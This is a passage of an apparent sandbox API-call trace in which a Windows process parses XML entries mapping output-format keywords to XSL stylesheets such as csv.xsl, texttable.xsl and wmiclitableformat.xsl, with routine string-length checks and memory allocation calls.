text=0x26fb5c | out: text=0x26fb5c*="hform.xsl") returned 0x0 [0074.224] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.224] malloc (_Size=0xc) returned 0x14fb58 [0074.225] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.225] free (_Block=0x14fb58) [0074.225] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0074.225] malloc (_Size=0xc) returned 0x14fb58 [0074.225] malloc (_Size=0xc) returned 0x14fb70 [0074.225] SysStringLen (param_1="HFORM") returned 0x5 [0074.225] SysStringLen (param_1="TABLE") returned 0x5 [0074.225] SysStringLen (param_1="HFORM") returned 0x5 [0074.225] SysStringLen (param_1="LIST") returned 0x4 [0074.225] SysStringLen (param_1="HFORM") returned 0x5 [0074.225] SysStringLen (param_1="HTABLE") returned 0x6 [0074.225] malloc (_Size=0x18) returned 0x14e988 [0074.225] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.225] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.225] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.225] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=6, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.225] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="xml.xsl") returned 0x0 [0074.225] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.225] malloc (_Size=0xc) returned 0x14fb88 [0074.225] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.226] free (_Block=0x14fb88) [0074.226] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="XML", varVal2=0x0)) returned 0x0 [0074.226] malloc (_Size=0xc) returned 0x14fb88 [0074.226] malloc (_Size=0xc) returned 0x14fba0 [0074.226] SysStringLen (param_1="XML") returned 0x3 [0074.226] SysStringLen (param_1="TABLE") returned 0x5 [0074.226] SysStringLen (param_1="XML") returned 0x3 [0074.226] SysStringLen (param_1="VALUE") returned 0x5 [0074.226] SysStringLen (param_1="VALUE") returned 0x5 [0074.226] SysStringLen (param_1="XML") returned 0x3 [0074.226] malloc (_Size=0x18) returned 0x14e9a8 [0074.226] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.226] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.226] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.226] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=7, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.226] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="mof.xsl") returned 0x0 [0074.226] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.226] malloc (_Size=0xc) returned 0x14fbb8 [0074.226] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.227] free (_Block=0x14fbb8) [0074.227] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="MOF", varVal2=0x0)) returned 0x0 [0074.227] malloc (_Size=0xc) returned 0x14fbb8 [0074.227] malloc (_Size=0xc) returned 0x14fbd0 [0074.227] SysStringLen (param_1="MOF") returned 0x3 [0074.227] SysStringLen (param_1="TABLE") returned 0x5 [0074.227] SysStringLen (param_1="MOF") returned 0x3 [0074.227] SysStringLen (param_1="LIST") returned 0x4 [0074.227] SysStringLen (param_1="MOF") returned 0x3 [0074.227] SysStringLen (param_1="RAWXML") returned 0x6 [0074.227] SysStringLen (param_1="LIST") returned 0x4 [0074.227] SysStringLen (param_1="MOF") returned 0x3 [0074.227] malloc (_Size=0x18) returned 0x14e9c8 [0074.227] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.227] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.227] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.227] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=8, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.227] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="csv.xsl") returned 0x0 [0074.227] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.227] malloc (_Size=0xc) returned 0x14fbe8 [0074.227] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.228] free (_Block=0x14fbe8) [0074.228] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="CSV", varVal2=0x0)) returned 0x0 [0074.228] malloc (_Size=0xc) returned 0x14fbe8 [0074.228] malloc (_Size=0xc) returned 0x14fc00 [0074.228] SysStringLen (param_1="CSV") returned 0x3 [0074.228] SysStringLen (param_1="TABLE") returned 0x5 [0074.228] SysStringLen (param_1="CSV") returned 0x3 [0074.228] SysStringLen (param_1="LIST") returned 0x4 [0074.228] SysStringLen (param_1="CSV") returned 0x3 [0074.228] SysStringLen (param_1="HTABLE") returned 0x6 [0074.228] SysStringLen (param_1="CSV") returned 0x3 [0074.228] SysStringLen (param_1="HFORM") returned 0x5 [0074.228] malloc (_Size=0x18) returned 0x14e9e8 [0074.228] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.228] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.228] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.228] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=9, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.228] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.228] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.228] malloc (_Size=0xc) returned 0x14fc18 [0074.229] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.229] free (_Block=0x14fc18) [0074.229] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0074.229] malloc (_Size=0xc) returned 0x14fc18 [0074.229] malloc (_Size=0xc) returned 0x14fc30 [0074.229] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.229] SysStringLen (param_1="TABLE") returned 0x5 [0074.229] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.229] SysStringLen (param_1="VALUE") returned 0x5 [0074.229] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.229] SysStringLen (param_1="XML") returned 0x3 [0074.229] SysStringLen (param_1="XML") returned 0x3 [0074.229] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.229] malloc (_Size=0x18) returned 0x14ea08 [0074.229] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.229] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.229] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.229] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=10, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.229] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.230] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.230] malloc (_Size=0xc) returned 0x14fc48 [0074.230] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.230] free (_Block=0x14fc48) [0074.230] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0074.230] malloc (_Size=0xc) returned 0x14fc48 [0074.230] malloc (_Size=0xc) returned 0x14fc60 [0074.230] SysStringLen (param_1="texttablewsys") returned 0xd [0074.230] SysStringLen (param_1="TABLE") returned 0x5 [0074.230] SysStringLen (param_1="texttablewsys") returned 0xd [0074.230] SysStringLen (param_1="XML") returned 0x3 [0074.230] SysStringLen (param_1="texttablewsys") returned 0xd [0074.230] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.230] SysStringLen (param_1="XML") returned 0x3 [0074.230] SysStringLen (param_1="texttablewsys") returned 0xd [0074.230] malloc (_Size=0x18) returned 0x14ea28 [0074.230] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.230] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.230] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.230] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=11, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.231] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.231] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.231] malloc (_Size=0xc) returned 0x14fc78 [0074.231] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.231] free (_Block=0x14fc78) [0074.231] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0074.231] malloc (_Size=0xc) returned 0x14fc78 [0074.231] malloc (_Size=0xc) returned 0x14fc90 [0074.231] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.231] SysStringLen (param_1="TABLE") returned 0x5 [0074.231] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.231] SysStringLen (param_1="XML") returned 0x3 [0074.231] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.231] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.231] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.231] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.231] malloc (_Size=0x18) returned 0x14ea48 [0074.231] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.231] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.231] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.231] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=12, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.232] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.232] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.232] malloc (_Size=0xc) returned 0x14fca8 [0074.232] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.232] free (_Block=0x14fca8) [0074.232] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0074.232] malloc (_Size=0xc) returned 0x14fca8 [0074.232] malloc (_Size=0xc) returned 0x14fcc0 [0074.232] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.232] SysStringLen (param_1="TABLE") returned 0x5 [0074.232] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.232] SysStringLen (param_1="XML") returned 0x3 [0074.232] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.232] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.232] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.232] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.232] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.232] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.232] malloc (_Size=0x18) returned 0x14ea68 [0074.232] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.233] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.233] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.233] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=13, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.233] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.233] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.233] malloc (_Size=0xc) returned 0x14fcd8 [0074.233] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.233] free (_Block=0x14fcd8) [0074.233] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0074.233] malloc (_Size=0xc) returned 0x14fcd8 [0074.233] malloc (_Size=0xc) returned 0x14fcf0 [0074.233] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.233] SysStringLen (param_1="TABLE") returned 0x5 [0074.233] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.233] SysStringLen (param_1="XML") returned 0x3 [0074.233] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.233] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.233] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.233] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.233] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.233] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.233] malloc (_Size=0x18) returned 0x14ea88 [0074.234] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.234] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.234] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.234] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=14, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.234] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="texttable.xsl") returned 0x0 [0074.234] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.234] malloc (_Size=0xc) returned 0x14fd08 [0074.234] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.234] free (_Block=0x14fd08) [0074.234] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0074.234] malloc (_Size=0xc) returned 0x14fd08 [0074.234] malloc (_Size=0xc) returned 0x14fd20 [0074.234] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0074.234] SysStringLen (param_1="TABLE") returned 0x5 [0074.234] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0074.234] SysStringLen (param_1="XML") returned 0x3 [0074.234] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0074.234] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.234] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0074.234] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.234] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0074.234] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.234] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.234] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0074.234] malloc (_Size=0x18) returned 0x14eaa8 [0074.235] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.235] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.235] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.235] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=15, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.235] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="htable.xsl") returned 0x0 [0074.235] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.235] malloc (_Size=0xc) returned 0x14fd38 [0074.235] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.235] free (_Block=0x14fd38) [0074.235] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0074.235] malloc (_Size=0xc) returned 0x14fd38 [0074.235] malloc (_Size=0xc) returned 0x14fd50 [0074.235] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0074.235] SysStringLen (param_1="TABLE") returned 0x5 [0074.235] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0074.235] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.235] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0074.235] SysStringLen (param_1="XML") returned 0x3 [0074.235] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0074.235] SysStringLen (param_1="texttablewsys") returned 0xd [0074.236] SysStringLen (param_1="XML") returned 0x3 [0074.236] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0074.236] malloc (_Size=0x18) returned 0x14eac8 [0074.236] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.237] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.237] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.237] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=16, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.237] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="htable.xsl") returned 0x0 [0074.237] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.237] malloc (_Size=0xc) returned 0x14fd68 [0074.237] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.237] free (_Block=0x14fd68) [0074.237] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0074.237] malloc (_Size=0xc) returned 0x14fd68 [0074.237] malloc (_Size=0xc) returned 0x14fd80 [0074.237] SysStringLen (param_1="htable-sortby") returned 0xd [0074.237] SysStringLen (param_1="TABLE") returned 0x5 [0074.238] SysStringLen (param_1="htable-sortby") returned 0xd [0074.238] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.238] SysStringLen (param_1="htable-sortby") returned 0xd [0074.238] SysStringLen (param_1="XML") returned 0x3 [0074.238] SysStringLen (param_1="htable-sortby") returned 0xd [0074.238] SysStringLen (param_1="texttablewsys") returned 0xd [0074.238] SysStringLen (param_1="htable-sortby") returned 0xd [0074.238] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0074.238] SysStringLen (param_1="XML") returned 0x3 [0074.238] SysStringLen (param_1="htable-sortby") returned 0xd [0074.238] malloc (_Size=0x18) returned 0x14eae8 [0074.238] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.238] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.238] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.238] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=17, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.238] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="mof.xsl") returned 0x0 [0074.238] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.238] malloc (_Size=0xc) returned 0x14fd98 [0074.238] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.238] free (_Block=0x14fd98) [0074.238] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0074.238] malloc (_Size=0xc) returned 0x14fd98 [0074.238] malloc (_Size=0xc) returned 0x14fdb0 [0074.239] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0074.239] SysStringLen (param_1="TABLE") returned 0x5 [0074.239] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0074.239] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.239] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0074.239] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.239] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0074.239] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.239] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.239] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0074.239] malloc (_Size=0x18) returned 0x14eb08 [0074.239] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.239] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.239] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.239] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=18, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.239] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="mof.xsl") returned 0x0 [0074.239] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.239] malloc (_Size=0xc) returned 0x14fdc8 [0074.239] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.239] free (_Block=0x14fdc8) [0074.239] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0074.240] malloc (_Size=0xc) returned 0x14fdc8 [0074.240] malloc (_Size=0xc) returned 0x14fde0 [0074.240] SysStringLen (param_1="wmiclimofformat") returned 0xf [0074.240] SysStringLen (param_1="TABLE") returned 0x5 [0074.240] SysStringLen (param_1="wmiclimofformat") returned 0xf [0074.240] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.240] SysStringLen (param_1="wmiclimofformat") returned 0xf [0074.240] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.240] SysStringLen (param_1="wmiclimofformat") returned 0xf [0074.240] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0074.240] SysStringLen (param_1="wmiclimofformat") returned 0xf [0074.240] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0074.240] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.240] SysStringLen (param_1="wmiclimofformat") returned 0xf [0074.240] malloc (_Size=0x18) returned 0x14eb28 [0074.240] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.240] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.240] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.240] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=19, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.240] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="textvaluelist.xsl") returned 0x0 [0074.240] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.240] malloc (_Size=0xc) returned 0x14fdf8 [0074.240] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.241] free (_Block=0x14fdf8) [0074.241] IXMLDOMNode:get_nodeValue (in: This=0x23e8c98, value=0x26faf8 | out: value=0x26faf8*(varType=0x8, wReserved1=0x14, wReserved2=0x2ef0, wReserved3=0x14, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0074.241] malloc (_Size=0xc) returned 0x14fdf8 [0074.241] malloc (_Size=0xc) returned 0x14fe10 [0074.241] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0074.241] SysStringLen (param_1="TABLE") returned 0x5 [0074.241] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0074.241] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0074.241] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0074.241] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0074.241] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0074.241] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.241] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0074.241] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0074.241] malloc (_Size=0x18) returned 0x14eb48 [0074.241] IUnknown:Release (This=0x23e4b20) returned 0x0 [0074.241] IUnknown:Release (This=0x23e8cf8) returned 0x0 [0074.241] IUnknown:Release (This=0x23e8c98) returned 0x0 [0074.241] IXMLDOMNodeList:get_item (in: This=0x23e8e80, index=20, listItem=0x26fb54 | out: listItem=0x26fb54*=0x23e4b20) returned 0x0 [0074.241] IXMLDOMNode:get_text (in: This=0x23e4b20, text=0x26fb5c | out: text=0x26fb5c*="textvaluelist.xsl") returned 0x0 [0074.241] IXMLDOMNode:get_attributes (in: This=0x23e4b20, attributeMap=0x26fb50 | out: attributeMap=0x26fb50*=0x23e8cf8) returned 0x0 [0074.241] malloc (_Size=0xc) returned 0x14fe28 [0074.242] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x23e8cf8, name="KEYWORD", namedItem=0x26fb4c | out: namedItem=0x26fb4c*=0x23e8c98) returned 0x0 [0074.242] free (_Block=0x14fe28) [0074.242] 